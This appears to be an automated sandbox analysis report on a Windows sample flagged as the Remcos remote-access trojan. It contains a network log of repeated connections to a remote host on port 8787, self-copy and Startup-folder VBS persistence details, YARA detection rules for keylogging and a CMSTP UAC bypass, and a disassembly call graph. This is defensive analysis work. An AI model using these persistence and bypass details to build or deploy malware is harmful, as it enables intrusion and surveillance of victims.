                                  Dec 8, 2024 09:34:36.160733938 CET500688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:36.280051947 CET878750068192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:38.099796057 CET878750068192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:38.099891901 CET500688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:38.100078106 CET500688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:38.219337940 CET878750068192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:38.413768053 CET500698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:38.533046961 CET878750069192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:38.536401033 CET500698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:38.536758900 CET500698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:38.656284094 CET878750069192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:40.471410036 CET878750069192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:40.471524000 CET500698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:40.471524000 CET500698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:40.590930939 CET878750069192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:40.772630930 CET500708787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:40.891973019 CET878750070192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:40.892353058 CET500708787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:40.892652035 CET500708787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:41.011950970 CET878750070192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:42.834309101 CET878750070192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:42.834405899 CET500708787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:42.834405899 CET500708787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:42.953661919 CET878750070192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:43.131819010 CET500718787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:43.251214981 CET878750071192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:43.251317978 CET500718787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:43.251647949 CET500718787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:43.371133089 CET878750071192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:45.193448067 CET878750071192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:45.193804979 CET500718787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:45.193852901 CET500718787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:45.313148022 CET878750071192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:45.476201057 CET500728787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:45.595479012 CET878750072192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:45.596375942 CET500728787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:45.596679926 CET500728787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:45.716195107 CET878750072192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:47.537748098 CET878750072192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:47.540302038 CET500728787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:47.540353060 CET500728787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:47.659615993 CET878750072192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:47.819411039 CET500738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:47.939933062 CET878750073192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:47.942528009 CET500738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:47.942712069 CET500738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:48.063385963 CET878750073192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:49.918701887 CET878750073192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:49.922435045 CET500738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:49.922511101 CET500738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:50.041686058 CET878750073192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:50.196580887 CET500748787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:50.316595078 CET878750074192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:50.318466902 CET500748787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:50.318836927 CET500748787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:50.438604116 CET878750074192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:52.252012014 CET878750074192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:52.252079010 CET500748787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:52.252132893 CET500748787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:52.371392965 CET878750074192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:52.506797075 CET500758787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:52.626235008 CET878750075192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:52.627896070 CET500758787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:52.628202915 CET500758787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:52.747675896 CET878750075192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:54.568891048 CET878750075192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:54.570583105 CET500758787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:54.570632935 CET500758787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:54.690018892 CET878750075192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:54.819089890 CET500768787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:54.938333988 CET878750076192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:54.938427925 CET500768787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:54.938754082 CET500768787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:55.058320999 CET878750076192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:56.877409935 CET878750076192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:56.877475977 CET500768787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:56.877507925 CET500768787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:56.998473883 CET878750076192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:57.115879059 CET500778787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:57.236548901 CET878750077192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:57.236639977 CET500778787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:57.236910105 CET500778787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:57.358103991 CET878750077192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:59.175117016 CET878750077192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:59.176393032 CET500778787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:59.176438093 CET500778787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:59.296029091 CET878750077192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:59.412781000 CET500788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:59.532160997 CET878750078192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:59.532288074 CET500788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:59.532736063 CET500788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:59.651962996 CET878750078192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:01.471962929 CET878750078192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:01.472151041 CET500788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:01.472210884 CET500788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:01.591475010 CET878750078192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:01.694453001 CET500798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:01.813796043 CET878750079192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:01.813874006 CET500798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:01.814357996 CET500798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:01.933610916 CET878750079192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:03.756493092 CET878750079192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:03.756721973 CET500798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:03.756721973 CET500798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:03.876205921 CET878750079192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:03.979304075 CET500808787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:04.098841906 CET878750080192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:04.099061966 CET500808787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:04.099808931 CET500808787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:04.219125986 CET878750080192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:06.035995960 CET878750080192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:06.036075115 CET500808787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:06.036217928 CET500808787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:06.155452013 CET878750080192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:06.241213083 CET500818787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:06.360769033 CET878750081192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:06.362459898 CET500818787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:06.362783909 CET500818787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:06.482068062 CET878750081192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:08.299350023 CET878750081192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:08.299436092 CET500818787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:08.299478054 CET500818787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:08.418791056 CET878750081192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:08.506599903 CET500828787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:08.625953913 CET878750082192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:08.628371954 CET500828787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:08.628705978 CET500828787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:08.748159885 CET878750082192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:10.565876961 CET878750082192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:10.568381071 CET500828787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:10.568414927 CET500828787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:10.687870979 CET878750082192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:10.772202969 CET500838787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:10.891572952 CET878750083192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:10.891660929 CET500838787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:10.892258883 CET500838787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:11.011559010 CET878750083192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:12.831654072 CET878750083192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:12.834511995 CET500838787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:12.834594011 CET500838787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:12.953903913 CET878750083192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:13.022254944 CET500848787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:13.141644001 CET878750084192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:13.141735077 CET500848787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:13.142100096 CET500848787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:13.261450052 CET878750084192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:15.081691980 CET878750084192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:15.082474947 CET500848787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:15.083146095 CET500848787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:15.202497005 CET878750084192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:15.272247076 CET500858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:15.391768932 CET878750085192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:15.394481897 CET500858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:15.394803047 CET500858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:15.514065981 CET878750085192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:17.331422091 CET878750085192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:17.331533909 CET500858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:17.331533909 CET500858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:17.450922012 CET878750085192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:17.507210970 CET500868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:17.626554012 CET878750086192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:17.626641035 CET500868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:17.627080917 CET500868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:17.746788979 CET878750086192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:19.565198898 CET878750086192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:19.565249920 CET500868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:19.565300941 CET500868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:19.684551954 CET878750086192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:19.740997076 CET500878787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:19.860269070 CET878750087192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:19.860431910 CET500878787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:19.860754013 CET500878787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:19.979974985 CET878750087192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:21.803447008 CET878750087192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:21.803519964 CET500878787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:21.803639889 CET500878787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:21.923132896 CET878750087192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:21.975260019 CET500888787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:22.094717026 CET878750088192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:22.094805956 CET500888787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:22.095103979 CET500888787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:22.214390993 CET878750088192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:24.038022041 CET878750088192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:24.040432930 CET500888787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:24.040509939 CET500888787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:24.159822941 CET878750088192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:24.209836960 CET500898787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:24.329152107 CET878750089192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:24.329276085 CET500898787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:24.329740047 CET500898787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:24.449974060 CET878750089192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:26.268671036 CET878750089192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:35:26.268734932 CET500898787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:26.268771887 CET500898787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:35:26.388132095 CET878750089192.210.150.26192.168.2.4

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:03:31:18
                                  Start date:08/12/2024
                                  Path:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\7056ZCiFdE.exe"
                                  Imagebase:0x880000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:03:31:21
                                  Start date:08/12/2024
                                  Path:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\7056ZCiFdE.exe"
                                  Imagebase:0x5d0000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 55%, ReversingLabs
                                  • Detection: 67%, Virustotal, Browse
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:3
                                  Start time:03:31:35
                                  Start date:08/12/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                                  Imagebase:0x7ff7df310000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:03:31:36
                                  Start date:08/12/2024
                                  Path:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Milburr\Allene.exe"
                                  Imagebase:0x5d0000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.6%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:8.6%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:55
                                    execution_graph 103824 881078 103829 88708b 103824->103829 103826 88108c 103860 8a2d40 103826->103860 103830 88709b __ftell_nolock 103829->103830 103863 887667 103830->103863 103834 88715a 103875 8a050b 103834->103875 103841 887667 59 API calls 103842 88718b 103841->103842 103894 887d8c 103842->103894 103844 887194 RegOpenKeyExW 103845 8be8b1 RegQueryValueExW 103844->103845 103850 8871b6 Mailbox 103844->103850 103846 8be8ce 103845->103846 103847 8be943 RegCloseKey 103845->103847 103898 8a0db6 103846->103898 103847->103850 103859 8be955 _wcscat Mailbox __wsetenvp 103847->103859 103849 8be8e7 103908 88522e 103849->103908 103850->103826 103853 8be90f 103911 887bcc 103853->103911 103855 8879f2 59 API calls 103855->103859 103856 8be929 103856->103847 103858 883f74 59 API calls 103858->103859 103859->103850 103859->103855 103859->103858 103920 887de1 103859->103920 103985 8a2c44 103860->103985 103862 881096 103864 8a0db6 Mailbox 59 API calls 103863->103864 103865 887688 103864->103865 103866 8a0db6 Mailbox 59 API calls 103865->103866 103867 887151 103866->103867 103868 884706 103867->103868 103924 8b1940 103868->103924 103871 887de1 59 API calls 103872 884739 103871->103872 103926 884750 103872->103926 103874 884743 Mailbox 103874->103834 103876 8b1940 __ftell_nolock 103875->103876 103877 8a0518 GetFullPathNameW 103876->103877 103878 8a053a 103877->103878 103879 887bcc 59 API calls 103878->103879 103880 887165 103879->103880 103881 887cab 103880->103881 103882 8bed4a 103881->103882 103883 887cbf 103881->103883 103953 888029 103882->103953 103948 887c50 103883->103948 103886 887173 103888 883f74 103886->103888 103887 8bed55 __wsetenvp _memmove 103889 883f82 103888->103889 103893 883fa4 _memmove 103888->103893 103891 8a0db6 Mailbox 59 API calls 103889->103891 103890 8a0db6 Mailbox 59 API calls 103892 883fb8 103890->103892 103891->103893 103892->103841 103893->103890 103895 887d99 103894->103895 103896 887da6 103894->103896 103895->103844 103897 8a0db6 Mailbox 59 API calls 103896->103897 103897->103895 103902 8a0dbe 103898->103902 103900 8a0dd8 103900->103849 103902->103900 103903 8a0ddc std::exception::exception 103902->103903 103956 8a571c 103902->103956 103973 8a33a1 RtlDecodePointer 103902->103973 103974 8a859b RaiseException 103903->103974 103905 8a0e06 103975 8a84d1 58 API calls _free 103905->103975 103907 8a0e18 103907->103849 103909 8a0db6 Mailbox 59 API calls 103908->103909 103910 885240 RegQueryValueExW 103909->103910 103910->103853 103910->103856 103912 887bd8 __wsetenvp 103911->103912 103913 887c45 103911->103913 103916 887bee 103912->103916 103917 887c13 103912->103917 103914 887d2c 59 API calls 103913->103914 103915 887bf6 _memmove 103914->103915 103915->103856 103984 887f27 59 API calls Mailbox 103916->103984 103919 888029 59 API calls 103917->103919 103919->103915 103921 887df0 __wsetenvp _memmove 103920->103921 103922 8a0db6 Mailbox 59 API calls 103921->103922 103923 887e2e 103922->103923 103923->103859 103925 884713 GetModuleFileNameW 103924->103925 103925->103871 103927 8b1940 __ftell_nolock 103926->103927 103928 88475d GetFullPathNameW 103927->103928 103929 884799 103928->103929 103930 88477c 103928->103930 103932 887d8c 59 API calls 103929->103932 103931 887bcc 59 API calls 103930->103931 103933 884788 103931->103933 103932->103933 103936 887726 103933->103936 103937 887734 103936->103937 103940 887d2c 103937->103940 103939 884794 103939->103874 103941 887d3a 103940->103941 103943 887d43 _memmove 103940->103943 103941->103943 103944 887e4f 103941->103944 103943->103939 103945 887e62 103944->103945 103947 887e5f _memmove 103944->103947 103946 8a0db6 Mailbox 59 API calls 103945->103946 103946->103947 103947->103943 103949 887c5f __wsetenvp 103948->103949 103950 888029 59 API calls 103949->103950 103951 887c70 _memmove 103949->103951 103952 8bed07 _memmove 103950->103952 103951->103886 103954 8a0db6 Mailbox 59 API calls 103953->103954 103955 888033 103954->103955 103955->103887 103957 8a5797 103956->103957 103966 8a5728 103956->103966 103982 8a33a1 RtlDecodePointer 103957->103982 103959 8a579d 103983 8a8b28 58 API calls __getptd_noexit 103959->103983 103962 8a575b RtlAllocateHeap 103963 8a578f 103962->103963 103962->103966 103963->103902 103965 8a5783 103980 8a8b28 58 API calls __getptd_noexit 103965->103980 103966->103962 103966->103965 103967 8a5733 103966->103967 103971 8a5781 103966->103971 103979 8a33a1 RtlDecodePointer 103966->103979 103967->103966 103976 8aa16b 58 API calls 2 library calls 103967->103976 103977 8aa1c8 58 API calls 8 library calls 103967->103977 103978 8a309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103967->103978 103981 8a8b28 58 API calls __getptd_noexit 103971->103981 103973->103902 103974->103905 103975->103907 103976->103967 103977->103967 103979->103966 103980->103971 103981->103963 103982->103959 103983->103963 103984->103915 103986 8a2c50 __initptd 103985->103986 103993 